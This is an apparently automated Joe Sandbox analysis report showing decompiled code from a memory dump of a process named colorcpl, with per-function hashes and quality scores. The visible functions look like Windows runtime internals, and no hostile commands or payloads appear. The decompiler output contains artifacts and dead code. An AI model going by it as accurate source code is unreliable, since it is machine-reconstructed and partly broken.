                                                                                                					_t93 = _t109;
                                                                                                					L23();
                                                                                                				}
                                                                                                				_t58 =  *_t109;
                                                                                                				if(_t58 == _t103) {
                                                                                                					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                                                                					_t58 = _t103;
                                                                                                					if(__eflags == 0) {
                                                                                                						_t93 = _t109;
                                                                                                						E06E41624(_t86, __eflags);
                                                                                                						_t58 =  *_t109;
                                                                                                					}
                                                                                                				}
                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                				if(_t58 != _t103) {
                                                                                                					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                                                				}
                                                                                                				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                                                				_t88 = _v16;
                                                                                                				_v28 = _t104;
                                                                                                				L9:
                                                                                                				while(1) {
                                                                                                					if(E06E37D50() != 0) {
                                                                                                						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                                                					} else {
                                                                                                						_t62 = 0x7ffe0382;
                                                                                                					}
                                                                                                					if( *_t62 != 0) {
                                                                                                						_t63 =  *[fs:0x30];
                                                                                                						__eflags = _t63[0x240] & 0x00000002;
                                                                                                						if((_t63[0x240] & 0x00000002) != 0) {
                                                                                                							_t93 = _t109;
                                                                                                							E06EAFE87(_t93);
                                                                                                						}
                                                                                                					}
                                                                                                					if(_t104 != 0xffffffff) {
                                                                                                						_push(_t88);
                                                                                                						_push(0);
                                                                                                						_push(_t104);
                                                                                                						_t64 = E06E59520();
                                                                                                						goto L15;
                                                                                                					} else {
                                                                                                						while(1) {
                                                                                                							_t97 =  &_v8;
                                                                                                							_t64 = E06E4E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                                                							if(_t64 == 0x102) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t93 =  *(_t109 + 4);
                                                                                                							_v8 = _t93;
                                                                                                							if((_t93 & 0x00000002) != 0) {
                                                                                                								continue;
                                                                                                							}
                                                                                                							L15:
                                                                                                							if(_t64 == 0x102) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t89 = _v24;
                                                                                                							if(_t64 < 0) {
                                                                                                								L06E6DF30(_t93, _t97, _t64);
                                                                                                								_push(_t93);
                                                                                                								_t98 = _t97 | 0xffffffff;
                                                                                                								__eflags =  *0x6f06901;
                                                                                                								_push(_t109);
                                                                                                								_v52 = _t98;
                                                                                                								if( *0x6f06901 != 0) {
                                                                                                									_push(0);
                                                                                                									_push(1);
                                                                                                									_push(0);
                                                                                                									_push(0x100003);
                                                                                                									_push( &_v12);
                                                                                                									_t72 = E06E59980();
                                                                                                									__eflags = _t72;
                                                                                                									if(_t72 < 0) {
                                                                                                										_v12 = _t98 | 0xffffffff;
                                                                                                									}
                                                                                                								}
                                                                                                								asm("lock cmpxchg [ecx], edx");
                                                                                                								_t111 = 0;
                                                                                                								__eflags = 0;
                                                                                                								if(0 != 0) {
                                                                                                									__eflags = _v12 - 0xffffffff;
                                                                                                									if(_v12 != 0xffffffff) {
                                                                                                										_push(_v12);
                                                                                                										E06E595D0();
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t111 = _v12;
                                                                                                								}
                                                                                                								return _t111;
                                                                                                							} else {
                                                                                                								if(_t89 != 0) {
                                                                                                									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                                                									_t77 = E06E37D50();
                                                                                                									__eflags = _t77;
                                                                                                									if(_t77 == 0) {
                                                                                                										_t64 = 0x7ffe0384;
                                                                                                									} else {
                                                                                                										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                									}
                                                                                                									__eflags =  *_t64;
                                                                                                									if( *_t64 != 0) {
                                                                                                										_t64 =  *[fs:0x30];
                                                                                                										__eflags = _t64[0x240] & 0x00000004;
                                                                                                										if((_t64[0x240] & 0x00000004) != 0) {
                                                                                                											_t78 = E06E37D50();
                                                                                                											__eflags = _t78;
                                                                                                											if(_t78 == 0) {
                                                                                                												_t64 = 0x7ffe0385;
                                                                                                											} else {
                                                                                                												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                											}
                                                                                                											__eflags =  *_t64 & 0x00000020;
                                                                                                											if(( *_t64 & 0x00000020) != 0) {
                                                                                                												_t64 = E06E97016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                								return _t64;
                                                                                                							}
                                                                                                						}
                                                                                                						_t97 = _t88;
                                                                                                						_t93 = _t109;
                                                                                                						E06EAFDDA(_t97, _v12);
                                                                                                						_t105 =  *_t109;
                                                                                                						_t67 = _v12 + 1;
                                                                                                						_v12 = _t67;
                                                                                                						__eflags = _t105 - 0xffffffff;
                                                                                                						if(_t105 == 0xffffffff) {
                                                                                                							_t106 = 0;
                                                                                                							__eflags = 0;
                                                                                                						} else {
                                                                                                							_t106 =  *(_t105 + 0x14);
                                                                                                						}
                                                                                                						__eflags = _t67 - 2;
                                                                                                						if(_t67 > 2) {
                                                                                                							__eflags = _t109 - 0x6f05350;
                                                                                                							if(_t109 != 0x6f05350) {
                                                                                                								__eflags = _t106 - _v20;
                                                                                                								if(__eflags == 0) {
                                                                                                									_t93 = _t109;
                                                                                                									E06EAFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						_push("RTL: Re-Waiting\n");
                                                                                                						_push(0);
                                                                                                						_push(0x65);
                                                                                                						_v20 = _t106;
                                                                                                						E06EA5720();
                                                                                                						_t104 = _v28;
                                                                                                						_t116 = _t116 + 0xc;
                                                                                                						continue;
                                                                                                					}
                                                                                                				}
                                                                                                			}


                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RTL: Re-Waiting
                                                                                                • API String ID: 0-316354757
                                                                                                • Opcode ID: d6fd7a6121530570baffe520c99861be83ae7185b67db7145d9cc06630d3a664
                                                                                                • Instruction ID: 86a92a9a1257944af583f02514e6fd322a7998278eb3c7ba72bfa8307cd86c9c
                                                                                                • Opcode Fuzzy Hash: d6fd7a6121530570baffe520c99861be83ae7185b67db7145d9cc06630d3a664
                                                                                                • Instruction Fuzzy Hash: 1D613730E407449FEBA2DF79DC44BBE77A6EF44368F142669E5219B2C0C7309A81DB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 80%
                                                                                                			E06EE0EA5(void* __ecx, void* __edx) {
                                                                                                				signed int _v20;
                                                                                                				char _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				unsigned int _v32;
                                                                                                				signed int _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				char _v44;
                                                                                                				intOrPtr _v64;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				signed int _t58;
                                                                                                				unsigned int _t60;
                                                                                                				intOrPtr _t62;
                                                                                                				char* _t67;
                                                                                                				char* _t69;
                                                                                                				void* _t80;
                                                                                                				void* _t83;
                                                                                                				intOrPtr _t93;
                                                                                                				intOrPtr _t115;
                                                                                                				char _t117;
                                                                                                				void* _t120;
                                                                                                
                                                                                                				_t83 = __edx;
                                                                                                				_t117 = 0;
                                                                                                				_t120 = __ecx;
                                                                                                				_v44 = 0;
                                                                                                				if(E06EDFF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                                                					L24:
                                                                                                					_t109 = _v44;
                                                                                                					if(_v44 != 0) {
                                                                                                						E06EE1074(_t83, _t120, _t109, _t117, _t117);
                                                                                                					}
                                                                                                					L26:
                                                                                                					return _t117;
                                                                                                				}
                                                                                                				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                				_t5 = _t83 + 1; // 0x1
                                                                                                				_v36 = _t5 << 0xc;
                                                                                                				_v40 = _t93;
                                                                                                				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                                                				asm("sbb ebx, ebx");
                                                                                                				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                                                				if(_t58 != 0) {
                                                                                                					_push(0);
                                                                                                					_push(0x14);
                                                                                                					_push( &_v24);
                                                                                                					_push(3);
                                                                                                					_push(_t93);
                                                                                                					_push(0xffffffff);
                                                                                                					_t80 = E06E59730();
                                                                                                					_t115 = _v64;
                                                                                                					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                                                						_push(_t93);
                                                                                                						E06EDA80D(_t115, 1, _v20, _t117);
                                                                                                						_t83 = 4;
                                                                                                					}
                                                                                                				}
                                                                                                				if(E06EDA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                                                					goto L24;
                                                                                                				}
                                                                                                				_t60 = _v32;
                                                                                                				_t97 = (_t60 != 0x100000) + 1;
                                                                                                				_t83 = (_v44 -  *0x6f08b04 >> 0x14) + (_v44 -  *0x6f08b04 >> 0x14);
                                                                                                				_v28 = (_t60 != 0x100000) + 1;
                                                                                                				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                                                				_v40 = _t62;
                                                                                                				if(_t83 >= _t62) {
                                                                                                					L10:
                                                                                                					asm("lock xadd [eax], ecx");
                                                                                                					asm("lock xadd [eax], ecx");
                                                                                                					if(E06E37D50() == 0) {
                                                                                                						_t67 = 0x7ffe0380;
                                                                                                					} else {
                                                                                                						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                					}
                                                                                                					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                						E06ED138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                                                					}
                                                                                                					if(E06E37D50() == 0) {
                                                                                                						_t69 = 0x7ffe0388;
                                                                                                					} else {
                                                                                                						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                					}
                                                                                                					if( *_t69 != 0) {
                                                                                                						E06ECFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                                                					}
                                                                                                					if(( *0x6f08724 & 0x00000008) != 0) {
                                                                                                						E06ED52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                                                					}
                                                                                                					_t117 = _v44;
                                                                                                					goto L26;
                                                                                                				}
                                                                                                				while(E06EE15B5(0x6f08ae4, _t83, _t97, _t97) >= 0) {
                                                                                                					_t97 = _v28;
                                                                                                					_t83 = _t83 + 2;
                                                                                                					if(_t83 < _v40) {
                                                                                                						continue;
                                                                                                					}
                                                                                                					goto L10;
                                                                                                				}
                                                                                                				goto L24;
                                                                                                			}

























                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `
                                                                                                • API String ID: 0-2679148245
                                                                                                • Opcode ID: f928ba100506c38d4fcdae071a6213109ae9b3798b90d2c600c5d55dc0dd93e0
                                                                                                • Instruction ID: 2f2926f6ffe0763e474522e8821bd5a5d2bad8167835d3c7718602f25269dc32
                                                                                                • Opcode Fuzzy Hash: f928ba100506c38d4fcdae071a6213109ae9b3798b90d2c600c5d55dc0dd93e0
                                                                                                • Instruction Fuzzy Hash: CC51FE702043819FD7A4DF28D884B5BB7E9FBC4314F14192CF9A287290E774E856CB66
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 75%
                                                                                                			E06E4F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                                                				intOrPtr _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				char* _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				char _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				char _v36;
                                                                                                				char _v44;
                                                                                                				char _v52;
                                                                                                				intOrPtr _v56;
                                                                                                				char _v60;
                                                                                                				intOrPtr _v72;
                                                                                                				void* _t51;
                                                                                                				void* _t58;
                                                                                                				signed short _t82;
                                                                                                				short _t84;
                                                                                                				signed int _t91;
                                                                                                				signed int _t100;
                                                                                                				signed short* _t103;
                                                                                                				void* _t108;
                                                                                                				intOrPtr* _t109;
                                                                                                
                                                                                                				_t103 = __ecx;
                                                                                                				_t82 = __edx;
                                                                                                				_t51 = E06E34120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                                                				if(_t51 >= 0) {
                                                                                                					_push(0x21);
                                                                                                					_push(3);
                                                                                                					_v56 =  *0x7ffe02dc;
                                                                                                					_v20 =  &_v52;
                                                                                                					_push( &_v44);
                                                                                                					_v28 = 0x18;
                                                                                                					_push( &_v28);
                                                                                                					_push(0x100020);
                                                                                                					_v24 = 0;
                                                                                                					_push( &_v60);
                                                                                                					_v16 = 0x40;
                                                                                                					_v12 = 0;
                                                                                                					_v8 = 0;
                                                                                                					_t58 = E06E59830();
                                                                                                					_t87 =  *[fs:0x30];
                                                                                                					_t108 = _t58;
                                                                                                					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                                                					if(_t108 < 0) {
                                                                                                						L11:
                                                                                                						_t51 = _t108;
                                                                                                					} else {
                                                                                                						_push(4);
                                                                                                						_push(8);
                                                                                                						_push( &_v36);
                                                                                                						_push( &_v44);
                                                                                                						_push(_v60);
                                                                                                						_t108 = E06E59990();
                                                                                                						if(_t108 < 0) {
                                                                                                							L10:
                                                                                                							_push(_v60);
                                                                                                							E06E595D0();
                                                                                                							goto L11;
                                                                                                						} else {
                                                                                                							_t109 = L06E34620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                                                							if(_t109 == 0) {
                                                                                                								_t108 = 0xc0000017;
                                                                                                								goto L10;
                                                                                                							} else {
                                                                                                								_t21 = _t109 + 0x18; // 0x18
                                                                                                								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                                                								 *_t109 = 1;
                                                                                                								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                                                								 *(_t109 + 0xe) = _t82;
                                                                                                								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                                                								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                                                								E06E5F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                                                								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                                                								_t91 =  *_t103 & 0x0000ffff;
                                                                                                								_t100 = _t91 & 0xfffffffe;
                                                                                                								_t84 = 0x5c;
                                                                                                								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                                                									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                                                										_push(_v60);
                                                                                                										E06E595D0();
                                                                                                										L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                                                										_t51 = 0xc0000106;
                                                                                                									} else {
                                                                                                										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                                                										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                                                										goto L5;
                                                                                                									}
                                                                                                								} else {
                                                                                                									L5:
                                                                                                									 *_a4 = _t109;
                                                                                                									_t51 = 0;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				return _t51;
                                                                                                			}

























                                                                                                0x06e8bacc
                                                                                                0x06e8bad1
                                                                                                0x06e4f215
                                                                                                0x06e4f218
                                                                                                0x06e4f226
                                                                                                0x06e4f22b
                                                                                                0x00000000
                                                                                                0x06e4f22b
                                                                                                0x06e4f1f6
                                                                                                0x06e4f1f6
                                                                                                0x06e4f1f9
                                                                                                0x06e4f1fb
                                                                                                0x06e4f1fb
                                                                                                0x06e4f1f4
                                                                                                0x06e4f191
                                                                                                0x06e4f173
                                                                                                0x06e4f152
                                                                                                0x06e4f203

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @
                                                                                                • API String ID: 0-2766056989
                                                                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                • Instruction ID: 4a5b25aba52a814c2d6470b9dc57d52a4c33be9bbdd08c8b68671b92392c7eb7
                                                                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                • Instruction Fuzzy Hash: AD518F715047109FD360DF29C840A6BBBF8FF88B10F00992DF9A597690E7B4E914CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 75%
                                                                                                			E06E93540(intOrPtr _a4) {
                                                                                                				signed int _v12;
                                                                                                				intOrPtr _v88;
                                                                                                				intOrPtr _v92;
                                                                                                				char _v96;
                                                                                                				char _v352;
                                                                                                				char _v1072;
                                                                                                				intOrPtr _v1140;
                                                                                                				intOrPtr _v1148;
                                                                                                				char _v1152;
                                                                                                				char _v1156;
                                                                                                				char _v1160;
                                                                                                				char _v1164;
                                                                                                				char _v1168;
                                                                                                				char* _v1172;
                                                                                                				short _v1174;
                                                                                                				char _v1176;
                                                                                                				char _v1180;
                                                                                                				char _v1192;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				short _t41;
                                                                                                				short _t42;
                                                                                                				intOrPtr _t80;
                                                                                                				intOrPtr _t81;
                                                                                                				signed int _t82;
                                                                                                				void* _t83;
                                                                                                
                                                                                                				_v12 =  *0x6f0d360 ^ _t82;
                                                                                                				_t41 = 0x14;
                                                                                                				_v1176 = _t41;
                                                                                                				_t42 = 0x16;
                                                                                                				_v1174 = _t42;
                                                                                                				_v1164 = 0x100;
                                                                                                				_v1172 = L"BinaryHash";
                                                                                                				_t81 = E06E50BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                                                				if(_t81 < 0) {
                                                                                                					L11:
                                                                                                					_t75 = _t81;
                                                                                                					E06E93706(0, _t81, _t79, _t80);
                                                                                                					L12:
                                                                                                					if(_a4 != 0xc000047f) {
                                                                                                						E06E5FA60( &_v1152, 0, 0x50);
                                                                                                						_v1152 = 0x60c201e;
                                                                                                						_v1148 = 1;
                                                                                                						_v1140 = E06E93540;
                                                                                                						E06E5FA60( &_v1072, 0, 0x2cc);
                                                                                                						_push( &_v1072);
                                                                                                						E06E6DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                                                						E06EA0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                                                						_push(_v1152);
                                                                                                						_push(0xffffffff);
                                                                                                						E06E597C0();
                                                                                                					}
                                                                                                					return E06E5B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                                                				}
                                                                                                				_t79 =  &_v352;
                                                                                                				_t81 = E06E93971(0, _a4,  &_v352,  &_v1156);
                                                                                                				if(_t81 < 0) {
                                                                                                					goto L11;
                                                                                                				}
                                                                                                				_t75 = _v1156;
                                                                                                				_t79 =  &_v1160;
                                                                                                				_t81 = E06E93884(_v1156,  &_v1160,  &_v1168);
                                                                                                				if(_t81 >= 0) {
                                                                                                					_t80 = _v1160;
                                                                                                					E06E5FA60( &_v96, 0, 0x50);
                                                                                                					_t83 = _t83 + 0xc;
                                                                                                					_push( &_v1180);
                                                                                                					_push(0x50);
                                                                                                					_push( &_v96);
                                                                                                					_push(2);
                                                                                                					_push( &_v1176);
                                                                                                					_push(_v1156);
                                                                                                					_t81 = E06E59650();
                                                                                                					if(_t81 >= 0) {
                                                                                                						if(_v92 != 3 || _v88 == 0) {
                                                                                                							_t81 = 0xc000090b;
                                                                                                						}
                                                                                                						if(_t81 >= 0) {
                                                                                                							_t75 = _a4;
                                                                                                							_t79 =  &_v352;
                                                                                                							E06E93787(_a4,  &_v352, _t80);
                                                                                                						}
                                                                                                					}
                                                                                                					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                                                				}
                                                                                                				_push(_v1156);
                                                                                                				E06E595D0();
                                                                                                				if(_t81 >= 0) {
                                                                                                					goto L12;
                                                                                                				} else {
                                                                                                					goto L11;
                                                                                                				}
                                                                                                			}
































                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BinaryHash
                                                                                                • API String ID: 0-2202222882
                                                                                                • Opcode ID: af034e99f0ff8e2bbbfa1f4eebeda4dd39eaf5494e857f2e356e69ba5cd3d2bc
                                                                                                • Instruction ID: 14929eaa653099a61beee772ac4f7f3f994acd90343d311853c196030a974203
                                                                                                • Opcode Fuzzy Hash: af034e99f0ff8e2bbbfa1f4eebeda4dd39eaf5494e857f2e356e69ba5cd3d2bc
                                                                                                • Instruction Fuzzy Hash: B24164B1D1062C9BDFA1DA50CC84FEEB77CAF44714F0155A5EA19AB241DB309E88CFA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E06EE05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                                                				signed int _v20;
                                                                                                				char _v24;
                                                                                                				signed int _v28;
                                                                                                				char _v32;
                                                                                                				signed int _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				void* __ebx;
                                                                                                				void* _t35;
                                                                                                				signed int _t42;
                                                                                                				char* _t48;
                                                                                                				signed int _t59;
                                                                                                				signed char _t61;
                                                                                                				signed int* _t79;
                                                                                                				void* _t88;
                                                                                                
                                                                                                				_v28 = __edx;
                                                                                                				_t79 = __ecx;
                                                                                                				if(E06EE07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                                                                					L13:
                                                                                                					_t35 = 0;
                                                                                                					L14:
                                                                                                					return _t35;
                                                                                                				}
                                                                                                				_t61 = __ecx[1];
                                                                                                				_t59 = __ecx[0xf];
                                                                                                				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                                                                				_v36 = _a8 << 0xc;
                                                                                                				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                                                                				asm("sbb esi, esi");
                                                                                                				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                                                                				if(_t42 != 0) {
                                                                                                					_push(0);
                                                                                                					_push(0x14);
                                                                                                					_push( &_v24);
                                                                                                					_push(3);
                                                                                                					_push(_t59);
                                                                                                					_push(0xffffffff);
                                                                                                					if(E06E59730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                                                                						_push(_t61);
                                                                                                						E06EDA80D(_t59, 1, _v20, 0);
                                                                                                						_t88 = 4;
                                                                                                					}
                                                                                                				}
                                                                                                				_t35 = E06EDA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                                                                				if(_t35 < 0) {
                                                                                                					goto L14;
                                                                                                				}
                                                                                                				E06EE1293(_t79, _v40, E06EE07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t48 = 0x7ffe0380;
                                                                                                				} else {
                                                                                                					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                				}
                                                                                                				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                					E06ED138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                                                                				}
                                                                                                				goto L13;
                                                                                                			}

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `
                                                                                                • API String ID: 0-2679148245
                                                                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                • Instruction ID: a3aec3e083f7f229f0f9d193273559521bae92f7bc4d2a885626d0b15cbb9edd
                                                                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                • Instruction Fuzzy Hash: 103104326003466BE7A0DE24CC44F9B77D9EBC4758F045229F9549B6C0D7B0E954CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 78%
                                                                                                			E06E4A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr _t35;
                                                                                                				intOrPtr _t39;
                                                                                                				intOrPtr _t45;
                                                                                                				intOrPtr* _t51;
                                                                                                				intOrPtr* _t52;
                                                                                                				intOrPtr* _t55;
                                                                                                				signed int _t57;
                                                                                                				intOrPtr* _t59;
                                                                                                				intOrPtr _t68;
                                                                                                				intOrPtr* _t77;
                                                                                                				void* _t79;
                                                                                                				signed int _t80;
                                                                                                				intOrPtr _t81;
                                                                                                				char* _t82;
                                                                                                				void* _t83;
                                                                                                
                                                                                                				_push(0x24);
                                                                                                				_push(0x6ef0220);
                                                                                                				E06E6D08C(__ebx, __edi, __esi);
                                                                                                				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                                                                                				_t79 = __ecx;
                                                                                                				_t35 =  *0x6f07b9c; // 0x0
                                                                                                				_t55 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                                                                                				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                                                                                				if(_t55 == 0) {
                                                                                                					_t39 = 0xc0000017;
                                                                                                					L11:
                                                                                                					return E06E6D0D1(_t39);
                                                                                                				}
                                                                                                				_t68 = 0;
                                                                                                				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                                                                                				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                                                                                				_t7 = _t55 + 8; // 0x8
                                                                                                				_t57 = 6;
                                                                                                				memcpy(_t7, _t79, _t57 << 2);
                                                                                                				_t80 = 0xfffffffe;
                                                                                                				 *(_t83 - 4) = _t80;
                                                                                                				if(0 < 0) {
                                                                                                					L14:
                                                                                                					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                                                                					L20:
                                                                                                					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                                                                                					_t39 = _t81;
                                                                                                					goto L11;
                                                                                                				}
                                                                                                				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                                                                                					_t81 = 0xc000007b;
                                                                                                					goto L20;
                                                                                                				}
                                                                                                				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                                                                                					_t59 =  *((intOrPtr*)(_t83 + 8));
                                                                                                					_t45 =  *_t59;
                                                                                                					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                                                                                					 *_t59 = _t45 + 1;
